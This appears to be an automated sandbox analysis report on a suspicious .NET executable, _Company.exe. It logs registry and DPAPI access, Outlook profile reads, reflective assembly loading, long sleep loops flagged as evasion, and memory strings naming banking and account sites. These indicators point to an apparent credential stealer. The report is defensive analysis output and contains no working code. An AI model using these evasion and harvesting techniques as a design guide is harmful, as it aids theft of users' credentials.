              Source: C:\Users\user\Desktop\_Company.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\_Company.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: _Company.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: _Company.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000001.00000002.4650749475.0000000005610000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: _Company.exe, -.cs.Net Code: CypherMatic System.Reflection.Assembly.Load(byte[])
              Source: _Company.exeStatic PE information: 0x86919054 [Wed Jul 17 15:10:12 2041 UTC]
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0535B518 pushfd ; iretd 1_2_0535B521
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_06170006 push es; iretd 1_2_0617001C
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0617A153 pushad ; iretd 1_2_0617A159
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_01399C30 push esp; retf 017Fh2_2_01399D55
              Source: _Company.exeStatic PE information: section name: .text entropy: 7.746330065690188
              Source: C:\Users\user\Desktop\_Company.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 1390000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeMemory allocated: 19B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599449Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599336Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598771Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598641Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598019Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597561Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597014Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596669Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596559Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595998Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595875Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594761Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594651Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594544Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594312Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594203Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeWindow / User API: threadDelayed 2122Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeWindow / User API: threadDelayed 7722Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -35971150943733603s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 3460Thread sleep count: 2122 > 30Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 3460Thread sleep count: 7722 > 30Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599449s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599336s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598771s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598516s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598391s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -598019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597561s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -597014s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596669s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596559s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595998s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594761s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594651s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594544s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exe TID: 5412Thread sleep time: -594203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599449Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599336Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598771Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598641Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598516Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 598019Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597561Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 597014Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596669Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596559Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595998Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595875Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595547Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595219Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594761Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594651Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594544Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594312Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeThread delayed: delay time: 594203Jump to behavior
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
